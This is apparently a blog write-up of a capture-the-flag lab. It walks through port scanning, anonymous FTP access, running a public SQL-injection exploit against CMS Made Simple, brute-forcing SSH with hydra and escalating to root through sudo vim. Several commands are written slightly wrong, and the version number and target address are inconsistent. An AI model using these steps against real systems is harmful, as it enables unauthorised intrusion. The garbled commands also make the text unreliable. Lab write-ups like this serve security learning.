Step 1: Scanning the target for open ports
For this I used Nmap tool and the results were as shown below.
$ Nmap -T14 -sC -sV -Pn -oN nmap/initial 10.10.183.25
Step 2: Access the target using the ports discovered.
Something interesting about the results is the Anonymous FTP Login allowed. (highlighted in green) This means I can use the following credentials;
Username: anonymous
Password: anonymous@domain.com
Luckily for this task you only require the username. Blow is a screenshot of the same.
After successful login, my focus was on discovering my environment and what I could access.
One of the directories I found was the pub which did
not help much or rather I did not know what to do with it after getting the
caution ‘use PASV’ which I am not conversant with.
Step 3:
Directory brute force.
After the FTP I decided to check whether the target has directories and whether one was running a vulnerable web application. For this step I used the command shown below. This is because it finds directories then goes ahead to find sub-directories sequentially.
$ dirb http://10.10.183.25
With this,
my interest was on the http://10.10.183.25/simple/
directory so I copied it to my browser and landed on a CMS home page.
Being a web application, my interest was on whether it is an older version and
what vulnerabilities led to the release of a newer version.
As show on
the screenshot above, I could tell that this was CMS Made Simple Version 2.2.8.
Having known the version all I had to do is search for the vulnerability in
version 2.8.8
Step 4: Enumeration.
$ Searchsploit -w cms made simple 2.2.8
I landed on CVE 2019-9053 which is SQL Injection.
The vulnerability was brought about by a python 2 script that could reveal the password. So I downloaded the script to my machine (46635.py) Next step was to make it executable with the following command;
$ sudo chmod +x 46635.py
Then I ran the script;
$ sudo python 46635.py -u
http://10.10.183.25/simple/ --crack -w
/usr/share/wordlist/rockyou.txt
Step 5:
Enumeration (Back to ftp).
$ ftp 10.10.51.204
Username:
anonymous
$ ls (checking files/directories in the current directory)
$ cd pub (changing directory to pub)
$ ls (displaying files in pub)
This is where I found the txt file ForMitch.txt
Knowing ssh port is open, using the name Mitch as a
username was worth a try.
Step 6: Brute forcing SSH.
For this I used hydra
$ hydra -s 2222 -v -q -l mitch -p /usr/share/wordlist/rockyou.txt -e nsr -t 4 -w 5 10.10.51.204 ssh
Having the username as Mitch I got the password: secret.
Step 7: SSH login
With the ssh credentials from the brute force I was able to login
$ ls (checking files/directories
in the current directory)
$ cat user.txt (checking contents of the txt file I found in the current directory)
1st flag Good job, keep up!
$ pwd (checking my current directory)
$ cd /home (changing directory)
$ ls (checking for other users)
With this I was able to establish that there is another user with the name sunbath
The next step was to check what root privileges the user Mitch can run and turns out its possible to run vim as root without the password.
Step 8:
Escalating root privileges
$ sudo vim -c ‘sh!’
With his I was able to access the root directory where I got the root.txt with the final flag.
W3ll don3. You made it!
Comments
Post a Comment